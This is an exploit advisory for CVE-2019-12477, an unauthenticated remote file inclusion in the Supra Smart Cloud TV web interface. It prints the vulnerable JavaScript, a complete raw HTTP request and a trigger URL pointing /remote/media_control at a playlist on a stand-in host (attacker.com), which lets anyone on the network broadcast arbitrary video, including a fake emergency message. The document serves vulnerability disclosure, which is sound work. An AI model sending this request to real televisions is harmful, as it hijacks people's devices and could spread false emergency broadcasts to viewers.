# Exploit Title: Remote file inclusion
# Date: 03-06-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://supra.ru
# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
# CVE: CVE-2019-12477
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
# https://www.inputzero.io/2019/06/hacking-smart-tv.html

Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which lets a local attacker broadcast a fake video without any authentication via /remote/media_control?action=setUri&uri=URI.

Technical Observation:
We are abusing openLiveURL(), which allows a local attacker to broadcast video on the Supra Smart Cloud TV. I found this vulnerability initially by source code review; crawling the application and reading every request then helped me trigger it.

Vulnerable code:

    // Client-side helper in the TV's web UI: the caller-supplied URL is passed
    // straight to /remote/media_control as the new media source.
    function openLiveTV(url) {
        $.get("/remote/media_control",
              {m_action: 'setUri', m_uri: url, m_type: 'video/*'},
              function (data, textStatus) {
                  if ("success" == textStatus) {
                      alert(textStatus);
                  } else {
                      alert(textStatus);
                  }
              });
    }

Vulnerable request:

    GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
    Host: 192.168.1.155
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1

To trigger the vulnerability, send a crafted request to the URL:

    http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

The uri parameter is expected to point to an HLS playlist (.m3u8). The request can be sent with curl -v -X GET; no session or credentials are checked, so this is an unauthenticated remote file inclusion.
An attacker could broadcast any video without authentication; in the worst case, the vulnerability could be leveraged to broadcast a fake emergency message.